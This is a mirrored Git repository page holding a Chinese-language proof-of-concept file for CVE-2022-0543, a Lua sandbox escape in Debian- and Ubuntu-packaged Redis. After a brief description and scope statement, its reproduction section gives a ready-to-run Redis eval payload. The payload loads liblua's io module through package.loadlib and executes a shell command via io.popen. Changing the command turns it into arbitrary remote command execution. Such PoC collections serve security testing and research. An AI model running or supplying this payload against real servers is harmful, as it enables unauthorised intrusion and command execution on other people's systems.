admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/服务器应用漏洞/Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

23 lines
817 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543
## 漏洞描述
Redis是著名的开源Key-Value数据库其具备在沙箱中执行Lua脚本的能力。
Debian以及Ubuntu发行版的源在打包Redis时在Lua沙箱中遗留了一个对象package攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数进而逃逸沙箱执行任意命令。
## 漏洞影响
```
只限于Debian和Debian派生的Linux发行版如Ubuntu上的Redis服务
```
## 漏洞复现
远程连接Redis, 执行POC
```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0
```
![image-20220524131958982](./images/202205241320211.png)
Reference in New Issue View Git Blame Copy Permalink